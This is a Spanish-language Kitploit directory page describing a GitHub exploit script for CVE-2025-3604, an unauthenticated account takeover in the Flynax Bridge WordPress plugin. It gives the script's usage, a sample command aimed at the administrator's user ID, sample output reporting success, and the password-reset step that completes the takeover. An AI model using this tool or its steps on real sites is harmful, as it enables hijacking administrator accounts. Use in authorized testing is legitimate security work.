Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-3604 — Flynax Bridge <= 2.2.0 - Escalada de privilegios no autenticada mediante apropiación de cuenta | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-3604
Autenticación y AutorizaciónEscalada de PrivilegiosAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2025-3604

CVE-2025-3604

Flynax Bridge <= 2.2.0 - Escalada de privilegios no autenticada mediante apropiación de cuenta

Ver Repositorio
12hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 Flynax Bridge <= 2.2.0 - Escalada de privilegios no autenticada mediante toma de cuenta

📄 Descripción

El plugin Flynax Bridge para WordPress es vulnerable a escalada de privilegios mediante toma de cuenta en todas las versiones hasta la 2.2.0 inclusive.

Esto se debe a que el plugin no valida correctamente la identidad de un usuario antes de actualizar los detalles de su cuenta (como el correo electrónico). Como resultado, los atacantes no autenticados pueden cambiar la dirección de correo electrónico de cualquier usuario, incluidos los administradores, y luego iniciar un restablecimiento de contraseña para tomar el control total de la cuenta.

CVE: CVE-2025-3604
CVSS: 9.8 (Crítico)
Publicado: 23 de abril de 2025
Última actualización: 24 de abril de 2025


⚙️ Ejemplo de salida del script

root@kitploit:~
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: [email protected]
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited

Después de una explotación exitosa, el atacante puede ir a la página de inicio de sesión de WordPress y hacer clic en "¿Perdiste tu contraseña?" usando el correo electrónico recién establecido para restablecer la contraseña y obtener acceso total a la cuenta objetivo.


🚀 Uso

root@kitploit:~
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID

WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target URL
  -mail, --newmail NEWMAIL
                          New email to set
  -id, --user_id USER_ID  User ID to exploit

🧪 Ejemplo

root@kitploit:~
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "[email protected]"

Explicación:

  • -u: URL base del sitio WordPress.
  • -id: ID del usuario objetivo (normalmente 1 para el administrador).
  • -mail: Nuevo correo electrónico que se establecerá para ese usuario.

⚠️ Descargo de responsabilidad

Úselo bajo su propio riesgo. Solo para pruebas autorizadas y fines educativos.

🧑‍💻

Por: Nxploited ( Khaled_alenazi )

Descargar herramienta